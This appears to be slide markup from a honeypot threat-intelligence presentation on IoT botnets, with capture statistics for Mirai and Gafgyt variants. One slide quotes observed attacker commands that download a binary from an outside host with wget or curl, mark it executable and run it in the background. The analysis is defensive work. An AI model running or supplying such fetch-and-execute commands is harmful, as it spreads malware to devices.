                <a:moveTo>
                  <a:pt x="38101" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3257549" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3278592" y="0"/>
                  <a:pt x="3295650" y="17058"/>
                  <a:pt x="3295650" y="38101"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="3295650" y="2066924"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3295650" y="2087967"/>
                  <a:pt x="3278592" y="2105025"/>
                  <a:pt x="3257549" y="2105025"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="38101" y="2105025"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17058" y="2105025"/>
                  <a:pt x="0" y="2087967"/>
                  <a:pt x="0" y="2066924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426351" y="3240881"/>
            <a:ext cx="3114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 Methods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426351" y="34694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wget http://IP/malware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578751" y="36980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 payload retrieval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426351" y="38885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curl -O http://IP/malware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578751" y="41171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Alternative download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426351" y="43076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chmod +x malware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578751" y="45362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 execution permissions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26351" y="4726781"/>
            <a:ext cx="3124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./malware &amp;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578751" y="4955381"/>
            <a:ext cx="2962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Background execution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316813" y="535543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ubicBezTo>
                  <a:pt x="0" y="25608"/>
                  <a:pt x="25608" y="0"/>
                  <a:pt x="57150" y="0"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="51792" y="26789"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="51792" y="57150"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="51792" y="58936"/>
                  <a:pt x="52685" y="60610"/>
                  <a:pt x="54181" y="61615"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="75612" y="75902"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="78068" y="77554"/>
                  <a:pt x="81394" y="76885"/>
                  <a:pt x="83046" y="74407"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84698" y="71929"/>
                  <a:pt x="84028" y="68625"/>
                  <a:pt x="81550" y="66973"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="62508" y="54293"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62508" y="26789"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="62508" y="23820"/>
                  <a:pt x="60119" y="21431"/>
                  <a:pt x="57150" y="21431"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="54181" y="21431"/>
                  <a:pt x="51792" y="23820"/>
                  <a:pt x="51792" y="26789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58" name="Text 56"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8473976" y="5345906"/>
            <a:ext cx="3190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Duration: 10-30 seconds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85763" y="5855494"/>
            <a:ext cx="11420475" cy="752475"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="11420475" h="752475">
                <a:moveTo>
                  <a:pt x="76203" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="11344272" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11386330" y="0"/>
                  <a:pt x="11420475" y="34145"/>
                  <a:pt x="11420475" y="76203"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11420475" y="676272"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="11420475" y="718330"/>
                  <a:pt x="11386330" y="752475"/>
                  <a:pt x="11344272" y="752475"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="76203" y="752475"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34145" y="752475"/>
                  <a:pt x="0" y="718330"/>
                  <a:pt x="0" y="6762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523875" y="6050756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61" name="Text 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="775841" y="6012656"/>
            <a:ext cx="109442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Pattern Consistency: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All 247 successful authentications followed this three-phase sequence with remarkable consistency, indicating standardized botnet automation scripts. The entire post-exploitation lifecycle completes in under 60 seconds, demonstrating the efficiency of modern IoT botnet operations.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6360" y="336360"/>
            <a:ext cx="1386965" cy="274071"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1386965" h="274071">
                <a:moveTo>
                  <a:pt x="33220" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1353744" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1372091" y="0"/>
                  <a:pt x="1386965" y="14873"/>
                  <a:pt x="1386965" y="33220"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1386965" y="240851"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1386965" y="259198"/>
                  <a:pt x="1372091" y="274071"/>
                  <a:pt x="1353744" y="274071"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33220" y="274071"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14885" y="274071"/>
                  <a:pt x="0" y="259185"/>
                  <a:pt x="0" y="240851"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33220"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14873"/>
                  <a:pt x="14873" y="0"/>
                  <a:pt x="33220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40174" y="415259"/>
            <a:ext cx="1228258" cy="141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5" b="1" spc="39" kern="0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Intelligence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2207" y="714245"/>
            <a:ext cx="11726910" cy="3986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39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Malware Payload Capture &amp; Analysis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6360" y="1316371"/>
            <a:ext cx="5655826" cy="2034768"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5655826" h="2034768">
                <a:moveTo>
                  <a:pt x="66435" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5589390" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5626082" y="0"/>
                  <a:pt x="5655826" y="29744"/>
                  <a:pt x="5655826" y="66435"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5655826" y="1968333"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5655826" y="2005024"/>
                  <a:pt x="5626082" y="2034768"/>
                  <a:pt x="5589390" y="2034768"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66435" y="2034768"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29744" y="2034768"/>
                  <a:pt x="0" y="2005024"/>
                  <a:pt x="0" y="1968333"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="66435"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="29769"/>
                  <a:pt x="29769" y="0"/>
                  <a:pt x="66435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39837" y="1519847"/>
            <a:ext cx="5331924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Capture Statistics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15259" y="2101210"/>
            <a:ext cx="1046452" cy="498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924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0768" y="2632741"/>
            <a:ext cx="85543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Unique Binaries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538664" y="1901886"/>
            <a:ext cx="764076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Mirai Variants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268856" y="1885275"/>
            <a:ext cx="589668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13 (59%)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38664" y="2151041"/>
            <a:ext cx="4252251" cy="66441"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4252251" h="66441">
                <a:moveTo>
                  <a:pt x="33221" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4219030" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4237377" y="0"/>
                  <a:pt x="4252251" y="14873"/>
                  <a:pt x="4252251" y="33221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4252251" y="33221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4252251" y="51568"/>
                  <a:pt x="4237377" y="66441"/>
                  <a:pt x="4219030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191919"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538664" y="2151041"/>
            <a:ext cx="2508163" cy="66441"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="2508163" h="66441">
                <a:moveTo>
                  <a:pt x="33221" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2474943" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2493290" y="0"/>
                  <a:pt x="2508163" y="14873"/>
                  <a:pt x="2508163" y="33221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="2508163" y="33221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="2508163" y="51568"/>
                  <a:pt x="2493290" y="66441"/>
                  <a:pt x="2474943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13" name="Text 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538664" y="2300534"/>
            <a:ext cx="85543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Gafgyt Variants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332832" y="2283924"/>
            <a:ext cx="523226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 (32%)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538664" y="2549689"/>
            <a:ext cx="4252251" cy="66441"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4252251" h="66441">
                <a:moveTo>
                  <a:pt x="33221" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4219030" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4237377" y="0"/>
                  <a:pt x="4252251" y="14873"/>
                  <a:pt x="4252251" y="33221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4252251" y="33221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4252251" y="51568"/>
                  <a:pt x="4237377" y="66441"/>
                  <a:pt x="4219030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191919"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538664" y="2549689"/>
            <a:ext cx="1362049" cy="66441"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1362049" h="66441">
                <a:moveTo>
                  <a:pt x="33221" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1328828" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1347176" y="0"/>
                  <a:pt x="1362049" y="14873"/>
                  <a:pt x="1362049" y="33221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="1362049" y="33221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1362049" y="51568"/>
                  <a:pt x="1347176" y="66441"/>
                  <a:pt x="1328828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7" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538664" y="2699183"/>
            <a:ext cx="872044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Other/Unknown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399793" y="2682572"/>
            <a:ext cx="456785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 (9%)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538664" y="2948338"/>
            <a:ext cx="4252251" cy="66441"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="4252251" h="66441">
                <a:moveTo>
                  <a:pt x="33221" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4219030" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4237377" y="0"/>
                  <a:pt x="4252251" y="14873"/>
                  <a:pt x="4252251" y="33221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4252251" y="33221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4252251" y="51568"/>
                  <a:pt x="4237377" y="66441"/>
                  <a:pt x="4219030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191919"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Shape 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1538664" y="2948338"/>
            <a:ext cx="382038" cy="66441"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="382038" h="66441">
                <a:moveTo>
                  <a:pt x="33221" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="348817" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="367152" y="0"/>
                  <a:pt x="382038" y="14886"/>
                  <a:pt x="382038" y="33221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="382038" y="33221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="382038" y="51556"/>
                  <a:pt x="367152" y="66441"/>
                  <a:pt x="348817" y="66441"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33221" y="66441"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14886" y="66441"/>
                  <a:pt x="0" y="51556"/>
                  <a:pt x="0" y="33221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8F8F8F"/>
          </a:solidFill>
          <a:ln/>
        </p:spPr>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="336360" y="3492327"/>
            <a:ext cx="5655826" cy="3363597"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5655826" h="3363597">
                <a:moveTo>
                  <a:pt x="66431" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5589395" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5626083" y="0"/>
                  <a:pt x="5655826" y="29742"/>
                  <a:pt x="5655826" y="66431"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5655826" y="3297166"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5655826" y="3333855"/>
                  <a:pt x="5626083" y="3363597"/>
                  <a:pt x="5589395" y="3363597"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="66431" y="3363597"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="29742" y="3363597"/>
                  <a:pt x="0" y="3333855"/>
                  <a:pt x="0" y="3297166"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="66431"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="29767"/>
                  <a:pt x="29767" y="0"/>
                  <a:pt x="66431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39837" y="3695804"/>
            <a:ext cx="5331924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Botnet Characteristics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3989" y="4065384"/>
            <a:ext cx="5240567" cy="1237471"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5240567" h="1237471">
                <a:moveTo>
                  <a:pt x="33226" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5207341" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5225691" y="0"/>
                  <a:pt x="5240567" y="14876"/>
                  <a:pt x="5240567" y="33226"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5240567" y="1204245"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5240567" y="1222596"/>
                  <a:pt x="5225691" y="1237471"/>
                  <a:pt x="5207341" y="1237471"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33226" y="1237471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14876" y="1237471"/>
                  <a:pt x="0" y="1222596"/>
                  <a:pt x="0" y="1204245"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14876"/>
                  <a:pt x="14876" y="0"/>
                  <a:pt x="3322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56109" y="4202420"/>
            <a:ext cx="149493" cy="132883"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="149493" h="132883">
                <a:moveTo>
                  <a:pt x="49831" y="24916"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="49831" y="11160"/>
                  <a:pt x="60991" y="0"/>
                  <a:pt x="74747" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="88502" y="0"/>
                  <a:pt x="99662" y="11160"/>
                  <a:pt x="99662" y="24916"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="99662" y="25850"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="99662" y="29925"/>
                  <a:pt x="96366" y="33221"/>
                  <a:pt x="92291" y="33221"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="57228" y="33221"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="53153" y="33221"/>
                  <a:pt x="49857" y="29925"/>
                  <a:pt x="49857" y="25850"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="49857" y="24916"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="139527" y="28238"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="142278" y="31897"/>
                  <a:pt x="141525" y="37114"/>
                  <a:pt x="137866" y="39865"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="112483" y="58889"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="113859" y="61199"/>
                  <a:pt x="114897" y="63742"/>
                  <a:pt x="115546" y="66441"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="141188" y="66441"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="145782" y="66441"/>
                  <a:pt x="149493" y="70153"/>
                  <a:pt x="149493" y="74747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="149493" y="79340"/>
                  <a:pt x="145782" y="83052"/>
                  <a:pt x="141188" y="83052"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116272" y="83052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116272" y="91357"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="116272" y="92032"/>
                  <a:pt x="116247" y="92732"/>
                  <a:pt x="116221" y="93407"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="137866" y="109628"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="141525" y="112379"/>
                  <a:pt x="142278" y="117596"/>
                  <a:pt x="139527" y="121256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="136776" y="124915"/>
                  <a:pt x="131559" y="125668"/>
                  <a:pt x="127900" y="122917"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="111523" y="110641"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="105502" y="122112"/>
                  <a:pt x="94264" y="130417"/>
                  <a:pt x="80975" y="132416"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="80975" y="72670"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="80975" y="69218"/>
                  <a:pt x="78198" y="66441"/>
                  <a:pt x="74747" y="66441"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="71295" y="66441"/>
                  <a:pt x="68518" y="69218"/>
                  <a:pt x="68518" y="72670"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="68518" y="132416"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="55229" y="130417"/>
                  <a:pt x="43991" y="122112"/>
                  <a:pt x="37970" y="110641"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21593" y="122917"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17934" y="125668"/>
                  <a:pt x="12717" y="124915"/>
                  <a:pt x="9966" y="121256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7215" y="117596"/>
                  <a:pt x="7968" y="112379"/>
                  <a:pt x="11627" y="109628"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33273" y="93407"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="33247" y="92732"/>
                  <a:pt x="33221" y="92058"/>
                  <a:pt x="33221" y="91357"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33221" y="83052"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8305" y="83052"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3711" y="83052"/>
                  <a:pt x="0" y="79340"/>
                  <a:pt x="0" y="74747"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="70153"/>
                  <a:pt x="3711" y="66441"/>
                  <a:pt x="8305" y="66441"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33947" y="66441"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="34596" y="63742"/>
                  <a:pt x="35634" y="61199"/>
                  <a:pt x="37010" y="58889"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="11627" y="39865"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="7968" y="37114"/>
                  <a:pt x="7215" y="31897"/>
                  <a:pt x="9966" y="28238"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12717" y="24578"/>
                  <a:pt x="17934" y="23825"/>
                  <a:pt x="21593" y="26577"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="49831" y="47755"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="53023" y="46431"/>
                  <a:pt x="56527" y="45678"/>
                  <a:pt x="60213" y="45678"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="89281" y="45678"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="92966" y="45678"/>
                  <a:pt x="96470" y="46405"/>
                  <a:pt x="99662" y="47755"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="127900" y="26577"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="131559" y="23825"/>
                  <a:pt x="136776" y="24578"/>
                  <a:pt x="139527" y="28238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5" name="Text 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="880349" y="4169199"/>
            <a:ext cx="780687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Mirai Botnet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47128" y="4434965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IoT device targeting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47128" y="4634289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DDoS attack capabilities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47128" y="4833613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Self-propagation via scanning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47128" y="5032937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Memory-resident (no persistence)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3989" y="5410823"/>
            <a:ext cx="5240567" cy="1237471"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5240567" h="1237471">
                <a:moveTo>
                  <a:pt x="33226" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5207341" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5225691" y="0"/>
                  <a:pt x="5240567" y="14876"/>
                  <a:pt x="5240567" y="33226"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="5240567" y="1204245"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="5240567" y="1222596"/>
                  <a:pt x="5225691" y="1237471"/>
                  <a:pt x="5207341" y="1237471"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="33226" y="1237471"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14876" y="1237471"/>
                  <a:pt x="0" y="1222596"/>
                  <a:pt x="0" y="1204245"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="33226"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="14876"/>
                  <a:pt x="14876" y="0"/>
                  <a:pt x="33226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47804" y="5547858"/>
            <a:ext cx="166104" cy="132883"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="166104" h="132883">
                <a:moveTo>
                  <a:pt x="91357" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="91357" y="-4594"/>
                  <a:pt x="87646" y="-8305"/>
                  <a:pt x="83052" y="-8305"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78458" y="-8305"/>
                  <a:pt x="74747" y="-4594"/>
                  <a:pt x="74747" y="0"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="74747" y="16610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49831" y="16610"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="36076" y="16610"/>
                  <a:pt x="24916" y="27770"/>
                  <a:pt x="24916" y="41526"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="24916" y="99662"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="24916" y="113418"/>
                  <a:pt x="36076" y="124578"/>
                  <a:pt x="49831" y="124578"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="116272" y="124578"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="130028" y="124578"/>
                  <a:pt x="141188" y="113418"/>
                  <a:pt x="141188" y="99662"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="141188" y="41526"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="141188" y="27770"/>
                  <a:pt x="130028" y="16610"/>
                  <a:pt x="116272" y="16610"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="91357" y="16610"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91357" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="41526" y="95510"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="41526" y="92058"/>
                  <a:pt x="44303" y="89281"/>
                  <a:pt x="47755" y="89281"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="56060" y="89281"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="59512" y="89281"/>
                  <a:pt x="62289" y="92058"/>
                  <a:pt x="62289" y="95510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62289" y="98961"/>
                  <a:pt x="59512" y="101738"/>
                  <a:pt x="56060" y="101738"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="47755" y="101738"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="44303" y="101738"/>
                  <a:pt x="41526" y="98961"/>
                  <a:pt x="41526" y="95510"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="72670" y="95510"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="72670" y="92058"/>
                  <a:pt x="75447" y="89281"/>
                  <a:pt x="78899" y="89281"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="87204" y="89281"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="90656" y="89281"/>
                  <a:pt x="93433" y="92058"/>
                  <a:pt x="93433" y="95510"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="93433" y="98961"/>
                  <a:pt x="90656" y="101738"/>
                  <a:pt x="87204" y="101738"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="78899" y="101738"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="75447" y="101738"/>
                  <a:pt x="72670" y="98961"/>
                  <a:pt x="72670" y="95510"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="103815" y="95510"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="103815" y="92058"/>
                  <a:pt x="106592" y="89281"/>
                  <a:pt x="110044" y="89281"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="118349" y="89281"/>
                </a:lnTo>
                <a:cubicBezTo>
